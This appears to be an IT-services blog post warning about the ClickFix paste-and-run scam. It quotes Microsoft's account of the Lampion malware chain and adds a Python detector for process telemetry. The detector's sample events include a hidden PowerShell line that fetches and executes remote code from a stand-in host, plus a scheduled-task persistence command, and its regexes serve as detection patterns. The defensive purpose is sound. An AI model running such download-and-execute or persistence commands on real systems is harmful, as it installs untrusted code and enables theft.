Organisations including Microsoft are warning about how scammers are changing the way they steal our data.
The so-called ClickFix scam asks you to type in data rather than click on a link. It is feared that some computer users may see the act of typing in numbers – often by copying and pasting – as safer than clicking on a link.
It may not be. Always think before you copy and paste a code or command that claims to verify your status.
Microsoft says:
Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.
The ClickFix technique attempts to trick users into running malicious commands on their devices by taking advantage of their target’s tendency to solve minor technical issues and other seemingly benign interactions, such as human verification and CAPTCHA checks.
It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell.
This is often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.
Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions. Organisations could thus reduce the impact of this technique by educating users in recognising its lures and by implementing policies that will harden the device configurations in their environment (for example, disallowing users to use the Run dialog if it’s not necessary in their daily tasks).
Microsoft Defender XDR also provides a comprehensive set of protection features that detect this threat at various stages of the attack chain.
A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure—usually a landing page—and trick them into executing a malicious command themselves. By adding this user interaction element in the attack chain, a threat using the ClickFix technique could slip through conventional and automated security solutions.
A case study
To illustrate a typical ClickFix attack chain, let’s look at a campaign we first identified in May 2025 targeting Portuguese organizations in government, finance, and transportation sectors to deliver Lampion malware, an infostealer focused on banking information. This campaign has since been observed in other countries—including Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico—targeting organizations in the government, education, transportation, and financial services industries. As of June 2025, this campaign remains active.
The Lampion malware campaign’s ClickFix lures, obfuscation methods, and multi-stage infection process are designed to evade detection:
- The threat actor sends phishing emails containing a ZIP file, which when opened, contains an HTML file that redirects target users to a fake Portuguese tax authority site where the ClickFix lure is hosted.
- The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs).
- The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.
- This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.
- The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.
- After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.
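The chain above (an interpreter launched from the Windows shell with a download-and-run command line, followed by a scheduled task or a script dropped under %TEMP%) is something a defender can look for in process-creation telemetry. The following is an added example written for this page, not Microsoft's detection logic or any product rule. It assumes process-creation events (Sysmon event 1 or Security event 4688) have been normalised into the small ProcEvent shape below; the sample events, usernames, task names and the example.invalid domain are constructed for illustration.

```python
"""Heuristic detector for ClickFix-style 'paste and run' execution.

Constructed example: flags an interpreter spawned directly by explorer.exe
(which is what the Run dialog does) whose command line fetches and executes
remote content, then reports persistence steps (schtasks, %TEMP% .vbs,
Startup folder) seen for the same user afterwards.
"""
import re
from dataclasses import dataclass

# Interpreters a paste-and-run lure typically hands the pasted text to.
PASTE_TARGETS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                 "wscript.exe", "cscript.exe"}

# Tokens that indicate "download something and execute it" in one line.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|downloadstring|"
    r"invoke-expression|\biex\b|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|"
    r"mshta\s+https?://)",
    re.IGNORECASE,
)

# Follow-on persistence of the kind described in the Lampion case study.
PERSISTENCE = re.compile(
    r"(schtasks(\.exe)?\s+/create|\\startup\\|%temp%.*\.vbs|\\temp\\.*\.vbs)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    ts: str            # ISO-8601 timestamp, used only for ordering
    user: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list:
    """Reasons this single event looks like ClickFix stage 1 (0, 1 or 2)."""
    reasons = []
    if basename(ev.parent_image) == "explorer.exe" and basename(ev.image) in PASTE_TARGETS:
        reasons.append("interpreter launched directly from explorer.exe (Run dialog / shell)")
    if DOWNLOAD_EXEC.search(ev.command_line):
        reasons.append("command line downloads and executes remote content")
    return reasons


def detect_clickfix(events: list) -> dict:
    """Return {user: [alert strings]} for users with a high-confidence
    paste-and-run event, plus any persistence step seen for them later."""
    alerts = {}
    stage1_seen = set()
    for ev in sorted(events, key=lambda e: e.ts):
        reasons = score_event(ev)
        if len(reasons) == 2:  # both conditions together: high confidence
            alerts.setdefault(ev.user, []).append(f"{ev.ts}: " + "; ".join(reasons))
            stage1_seen.add(ev.user)
        elif ev.user in stage1_seen and PERSISTENCE.search(ev.command_line):
            alerts[ev.user].append(
                f"{ev.ts}: persistence after paste-and-run ({basename(ev.image)})")
    return alerts


# Constructed sample telemetry (not real logs): one victim, three benign users.
SAMPLE_EVENTS = [
    ProcEvent("2025-06-02T09:14:03Z", "CORP\\alice", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "irm https://example.invalid/verify | iex"'),
    ProcEvent("2025-06-02T09:14:09Z", "CORP\\alice", r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\schtasks.exe",
              'schtasks.exe /create /tn "SysUpdate" /tr "wscript.exe %TEMP%\\upd2.vbs" /sc once /st 10:30'),
    ProcEvent("2025-06-02T09:20:00Z", "CORP\\bob", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),  # user simply opened a console: one condition only
    ProcEvent("2025-06-02T09:25:00Z", "CORP\\carol", r"C:\Program Files\devenv.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -NoProfile -Command "Invoke-WebRequest https://intranet.example/pkg.zip -OutFile pkg.zip"'),
    ProcEvent("2025-06-02T09:30:00Z", "CORP\\dave", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\schtasks.exe",
              "schtasks.exe /create /tn Backup /tr backup.cmd /sc daily"),  # no stage 1 for dave
]

if __name__ == "__main__":
    for user, hits in detect_clickfix(SAMPLE_EVENTS).items():
        print(user)
        for h in hits:
            print("  ", h)
```

The two stage-1 conditions are deliberately required together: a user opening PowerShell from the Start menu, or a build tool calling Invoke-WebRequest, each trips one of them and is ignored, whereas the Run-dialog paste trips both. Persistence hits are only attached to users who already have a stage-1 alert, which keeps routine scheduled-task creation by services out of the report.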
It is recommended that companies educate staff about ClickFix scams. Above all, look carefully at what you copy and paste.
Microsoft says companies must check their email filtering systems – if you need advice on this, please contact us at UK Business IT.